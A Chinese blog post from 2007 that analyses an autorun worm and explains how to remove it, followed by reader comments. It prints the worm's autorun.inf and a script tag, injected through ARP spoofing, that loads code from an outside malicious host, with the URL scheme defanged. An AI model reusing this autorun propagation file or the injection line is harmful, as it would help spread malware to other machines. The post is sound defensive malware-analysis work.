百度空间 | 百度首页 
 
查看文章
 
[警惕]"随机8位数".exe又更新了```无语了
2007-05-29 12:32

昨晚``5月28日收到的样本``一个MM电脑上抓过来的```早上跟踪了下``

呼```又更新了``头疼````````

以前写的分析:

http://hi.baidu.com/%B9%C2%B6%C0%B8%FC%BF%C9%BF%BF/blog/item/230a82af1f6619cd7cd92a9d.html

======================================================

Aditional Information

File size: 36435 bytes
MD5: 23d80e8e5c2b7eb19e006e80c9bd4bfb
SHA1: e760703c8776c652b424fa62af945434fb786be5
CRC32        : 9511CA27
RIPEMD160: E78A1F72018D954CF51E08CDC0A1EFAE9F0CD57C
HAVAL(128bit,pass=5): 8AF756D5E8FB386439C81D694B04095E
packers: UPX
Language:Borland Delphi 6.0 - 7.0

======================================================

病毒行为(简单写了```):

1、病毒是一个8位随机数组成的(0—F),其实是本身机子的机器码。运行后释放同名的Dll文件,设置系统全局挂勾。后枚举进程,插入TIMPlatform.exe和Explorer.exe进程(如果有)

Dll的文件在C:\Program Files\Common Files\MicrosoftShared\MSInfo\下,目录下还有个同名的dat文件```

最后还释放了一个hlp(系统帮助文件),在%Windir%\help\下,44字节的,属性为存档```

(dll文件48723 字节,dat的36435 字节,属性为系统-隐藏-只读)````

2、插入进程的随机8位数.dll检测窗口句柄,并关闭列入病毒名单的“关键字”一些冷门的工具也不放过`````

3、修改IFEO重定向劫持,指向的是:C:\Program Files\Common Files\MicrosoftShared\MSInfo\的Dat文件。

4、破坏安全模式和显示隐藏文件,达到自身防护的目的。

5、释放一个Dl1.exe,创建远程线程并调用IE下载木马,下了一大推,乱乱的````

6、(遍历)每个分区,在跟目录下生成Autorun.inf和随机8位的EXE,达到双击硬盘激活病毒。

Autorun.inf内容为:

[AutoRun]
open=随机8位数.exe
shell\open=打开(&O)
shell\open\Command=随机8位数.exe
shell\open\Default=1
shell\explore=资源管理器(&X)
shell\explore\Command=随机8位数.exe

7、依附宿主的随机8位Dll每隔一段时间刷新,检测自身释放的“同党”和修改的注册表项,如果被修改和删除的话即使其恢复。并监视移动介质盘插入,支持U盘传播`````````

8、修改安全工具(杀软)服务和驱动的启动类型,设置为禁用,并删除其RUN启项,最后还挂了系统自带的防火墙``

9、用安全工具(如果能打开)检测宿主模块时,那么它则卸掉自身,安全工具退出(关闭)时,重新注入。

10、"病毒版本":在C:\Program Files和C:\WINNT\system32\DirectX,释放一个.ini的文本,里面生成病毒的版本``我生成的是525,也就是5.25日更新的版本。

11、局域ARP挂马````比较“旁门”的技术(开始有点佩服作者)由外部下载的病毒ycnt9.exe,释放的win1ogo.exe,由它监听局域,每5秒刷新从自身机子(被感染的)经过的ARP数据包,并插入一短Js代码`````

代码内容为:

"<script language=javascript src=h**p://google.171738.org/ad2.js></script>"

呵呵,我把Http改为H**p。嗅探范围:192.168.0.1-192.168.0.254,这意味着经过该被感染机子的数据包返回时,是一段被挂马的数据包!!!说简单点就是你浏览的所有网页上都有病毒。后来我点入该网址,是个MD5一样的8位随机病毒,呵呵,病毒名字为“hello.exe”。

这可比访问局域穷举猜口令轻松多了,这也是我佩服作者的地方。````(有点贬义)

12、常驻进程的随机8位数.dll每毫秒刷新,尝试拦截FindWindowExA、mouse_event等信息函数,修改映像命令,发送“假情报”`````向瑞星注册表监控捕捉发送“允许”命令`(不经过用户操作)``````

解决方案:

先到http://free.ys168.com/?gudugengkekao下载工具

SREng、冰刃、PowerRMV 、autoruns、unlocker1.8.5.exe、“显示隐藏文件”(注册表)和“修复安全模式”(注册表)
直接放桌面,后断开网络(这点很重要)然后按步骤```
重要提示:先把所有工具都重命名,不然由于IFEO的影响,无法运行的。例如 7.exe a8u7.exe apoe.exe(不要有规律````)
1、打开冰刃(改名了吧?!),结束一个8位数字的EXE文件(如有看到,没有则忽略)然后用冰刃的“文件”功能```展开到C:\Program Files\Common Files\Microsoft Shared\MSINFO\下````删除2个8位随机数字的文件。扩展名分别为:dat 和dll````再到%windir%\help\删除同名的.hlp(系统帮助文件图标````大小为44字节)
注意:我测试的时候并不能删除掉(其实是删除后再生成),如果上面用冰刃无法删除的话,那么则用unlocker删除,用法很简单哦(需要安装)。在此之前先把下载下来的"显示隐藏文件"注册表导入,然后显示所有隐藏文件,到它的目录下用Unlocker解锁删除!
2、这时候所有安全工具等都可以打开了,首先打开PowerRMV,填入:(一次一个,找不到的忽略)
C:\autorun.inf             D:\autorun.inf             E:\autorun.inf             F:\autorun.inf
3、还有autorun.inf指向的病毒,扩展名为exe的。也一并删除!!
4、打开autoruns(改名了吧?!)删除IFEO劫持项``挨个删```
5、下载的SREng,删除下面的:(不一定全)
注册表
<testrun><C:\DOCUME~1\admin\LOCALS~1\Temp\testexe.exe>      []
        <Kvsc><C:\winnt\Kvsc3.exe>      []
        <msccrt><C:\winnt\msccrt.exe>      []
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run]
        <MSDEG32><LYLoader.exe>      []
        <MSDWG32><LYLoadbr.exe>      [N/A]
        <MSDCG32        ><LYLeador.exe>      [N/A]
        <MSDOG32><LYLoador.exe>      [N/A]
        <MSDSG32><LYLoadar.exe>      [N/A]
        <MSDMG32><LYLoadmr.exe>      [N/A]
        <MSDHG32><LYLoadhr.exe>      [N/A]
        <MSDQG32><LYLoadqr.exe>      [N/A]
服务
[Win32 Display Driver / Win32DDS][Stopped/Auto Start]
      <C:\winnt\system32\rundll32.exe windds32.dll,input><Microsoft Corporation>
[Win32 Debug Service / MSDebugsvc][Stopped/Auto Start]
      <C:\winnt\system32\rundll32.exe msdebug.dll,input><Microsoft Corporation>

驱动程序
[Netgroup Packet Filter / NPF][Running/Manual Start]
      <system32\drivers\npf.sys><CACE Technologies>
还有些其他Dll的病毒文件,不记得那么许多了```(后面再用杀软解决)
6、打开注册表,查找随机释放的DLL文件(8位数),找到后删除,我测试时生成的是:
HKEY_CLASSES_ROOT\CLSID\{0A7204B0-04B0-A72E-B0A7-4B0724B0A72E}\InProcServer32\
C:\Program Files\Common Files\Microsoft Shared\MSINFO\04B0A72E.dll
7、下载的注册表导入``修复安全模式和显示隐藏文件项。
上面做完后重装下杀软(技术硬的话,自己重写回注册表,和设置其启动类型),升级最高版本,全盘扫。
======================================================
后话:
古人为什么推崇“德才兼备”?那只是因为有才没德的人,危害更大!!!!!!!
孤独更可靠真诚希望病毒的作者能因此停止更新,学技术是为了帮助更多的人……而不是“搞破坏”````
一些图:

图片点击可在新窗口打开查看此主题相关图片如下:
图片点击可在新窗口打开查看

图片点击可在新窗口打开查看此主题相关图片如下:
图片点击可在新窗口打开查看

图片点击可在新窗口打开查看此主题相关图片如下:
图片点击可在新窗口打开查看

图片点击可在新窗口打开查看此主题相关图片如下:
图片点击可在新窗口打开查看

图片点击可在新窗口打开查看此主题相关图片如下:
图片点击可在新窗口打开查看

图片点击可在新窗口打开查看此主题相关图片如下:
图片点击可在新窗口打开查看

图片点击可在新窗口打开查看此主题相关图片如下:
图片点击可在新窗口打开查看

图片点击可在新窗口打开查看此主题相关图片如下:
图片点击可在新窗口打开查看

图片点击可在新窗口打开查看此主题相关图片如下:
图片点击可在新窗口打开查看

图片点击可在新窗口打开查看此主题相关图片如下:
图片点击可在新窗口打开查看

图片点击可在新窗口打开查看此主题相关图片如下:
图片点击可在新窗口打开查看

图片点击可在新窗口打开查看此主题相关图片如下:
图片点击可在新窗口打开查看

图片点击可在新窗口打开查看此主题相关图片如下:
图片点击可在新窗口打开查看

图片点击可在新窗口打开查看此主题相关图片如下:
图片点击可在新窗口打开查看

图片点击可在新窗口打开查看此主题相关图片如下:
图片点击可在新窗口打开查看

类别:原创(病毒分析)``` | 添加到搜藏 | 浏览() | 评论 (25)
 
最近读者:
 
网友评论:
1
2007-05-29 21:23 | 回复
现在的病毒越来越BT了,这个病毒就象前段时间的几个病毒的集大成者
 
2
2007-05-29 22:03 | 回复
麻烦发个样本!谢谢 lyttle@sina.com
 
3
2007-05-30 10:57 | 回复
我上次也中了这个病毒,我只有重装,前面第一步我完成了,但是杀各个盘的autorun.inf文件和随机码.exe怎么删都删不掉呀
 
4
2007-05-30 11:01 | 回复
怎么删除不掉?`` 可以的啊?`` 前提是那个Dll没有插在进程里```
 
5
2007-05-30 11:10 | 回复
从任务管理器上根本看不出来有什么问题,用unlook解锁,刚解锁,他又插入了,SREng改名好像不行,打不开,冰刃改名后可以打开的,重装系统了两次,要不是我用cmd删除掉存在其它盘的文件,这个病毒会一直存在的
 
6
2007-05-30 11:36 | 回复
麻烦你发个样本,我想试试....谢谢...
 
7
2007-05-30 11:53 | 回复
To5: 按顺序,用IS介入``这时候DLL删除不了,显示所有隐藏文件后 到它目录下删除,用Unlooker解开后删除`` 其他下面的都一样`` To6: 样本仍了,找阳光要吧,卡卡猫叔也有``
 
8
2007-05-30 13:48 | 回复
我也中了这个病毒。想问一下,我在中毒后尝试进入安全模式,可是此后就不断自动重启,连正常进入系统都不可以了。有什么方法可以解决吗? 谢谢了
 
9
2007-05-30 14:14 | 回复
昨晚我的机子也中了这个毒,随机8位数是C14B0716.exe。。。都不知道怎么进来的,机子里同时装了AVG Anti Spyware和Symantec AntiVirus都没防住。。。现在最大的问题是怎么清除移动硬盘上的autorun.inf和C14B0716.exe。。。
 
10
2007-05-30 15:48 | 回复
To8:病毒是删除Safeboot下的键值,进安全模式的话只会蓝屏``` 你可以用SRENG或注册表导入修复``正常系统没有影响`` To9:移动盘上比较简单,在本机设置为不自动播放``然后再删除掉就可以了(不要双击进入) 需要有一定的胆量和技术``` 自己找下相关资料吧``
 
11
2007-05-30 16:27 | 回复
不错,学习。
 
12
2007-05-30 20:35 | 回复
我把能删的都删了,综合了崔老师和你的帖子,但是感觉还是有毒。想发一个SREng扫描日志,你猜发生什么事了——(在安全模式下)我扫了n久的时间,可就是不出结果。这到底是啥原因呀 晕死我了!!!对了avg的驻留护顿也废了
 
13
2007-05-31 01:07 | 回复
请问,这个病毒会使电脑打开网页时显示脚本错误吗?如果重装的话需要全格,还是只格C盘?拜托啊,我的QQ403899101 MSN:rose_jn008@hotmail.com十感谢
 
14
2007-05-31 01:07 | 回复
请问,这个病毒会使电脑打开网页时显示脚本错误吗?如果重装的话需要全格,还是只格C盘?拜托啊,我的QQ403899101 MSN:rose_jn008@hotmail.com十感谢
 
15
2007-05-31 01:08 | 回复
请问,这个病毒会使电脑打开网页时显示脚本错误吗?如果重装的话需要全格,还是只格C盘?拜托啊,我的QQ403899101 MSN:rose_jn008@hotmail.com十感谢
 
16
2007-05-31 01:12 | 回复
真是太感谢了,终于搞定了,累了一晚上,是不是用以上步骤杀完就没什么隐患了啊?我杀完了用刚恢复功能地金山查了n遍一个可疑文件都没查着,弄地我有点不放心,是金山不行还是都杀完了啊? 等待回复,谢谢~~
 
17
2007-05-31 01:37 | 回复
呵呵高兴地过程没说清楚啊 刚中毒地时候,一发现就把网线拔了,然后进安全模式失败,于是按上述过程查杀, 病毒平时不出现在进程中,只有重起,进f8失败,进windows后结束exploer,然后创建个能被它拦截的软件时,在资源管理器才出现,然后冰刃才能检测到~~~ 进行到2地时候,就是用PowerRMV软件,改名之后同样打不开,有时只能打开很短时间........操作那得叫一个快啊`~~~~~ 还有一个是进行到5用SREng软件时,根本找不到你说的那些服务,注册表,驱动.... 再就是到6删除HKEY_CLASSES_ROOT\CLSID\{0A7204B0-04B0-A72E-B0A7-4B0724B0A72E}\InProcServer32\C:\Program Files\Common Files\Microsoft Shared\MSINFO\04B0A72E.dll时,删除之后有重新创建,explorer和ctfmon等进程一直有病毒,最后删掉一个叫mode的注册表键时才停止创建文件(.ini .exe)....... 希望提供地线索对大家~能有帮助~~~
 
18
2007-05-31 08:14 | 回复
To12:扫日志别安全模式扫``打折扣的```杀软工具的确都会挂,用SREng可以重新写回,建议重装杀软,那样会比较快``` To13-15:嗯,重装是可以的`` 不过也没必要`` 如果你执意要重装的话`` 那么重装后,不要双击C盘外任何盘``拔掉移动介质盘 打开rar,展开到E-F盘下,删除Autorun.inf和随机8位数字的EXE文件``` 也可以用Dos下删除,开始-运行-Cmd cd d: dir /a del ********.exe /f/s/q/a del autorun.inf /f/s/q/a 切记```删除之前不要双击分区``` To16-17:谢谢分享经验``
 
19
2007-06-04 12:07 | 回复
解决方法:修改注册表选项:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL 值CheckedValue,修改为"1" 然后在 工具--文件夹选项--查看 里面打开“显示所有文件和文件夹” 把“隐藏受保护的操作系统文件(推荐)” 打钩去掉 按ctrl+alt+del 弹出任务管理器窗口在“进程”里面结束exploere.exe进程 在任务管理器窗的“应用程序”里面按“新任务”按钮创建新任务,按“浏览”按钮弹出一个浏览器窗口,在此窗口中把上述 病毒所在目录里的病毒删除,重新安装系统或ghost恢复系统
 
20
2007-06-06 09:41 | 回复
谢谢高手
 
21
2007-06-06 18:30 | 回复
重装系统, 染后马上运行杀毒软件, 能不能接决问提
 
22
2007-06-08 09:43 | 回复
直接把硬盘全格能解决问题吗
 
23
2007-06-08 11:21 | 回复
可以````` 至今还没听到全盘格还不能解决的`` 哈,引导区病毒除外```
 
26
2007-06-12 20:18 | 回复
单位机器前天中招,自己想办法干掉了,看了你的文章后,发现有遗漏,看来得反工一下。 谢谢了!
 
27
2007-10-09 15:23 | 回复
这个病毒作者疯掉了。
 
发表评论:
姓 名:
网址或邮箱: (选填)
内 容:
验证码: 请点击后输入四位验证码,字母不区分大小写
      

     

©2009 Baidu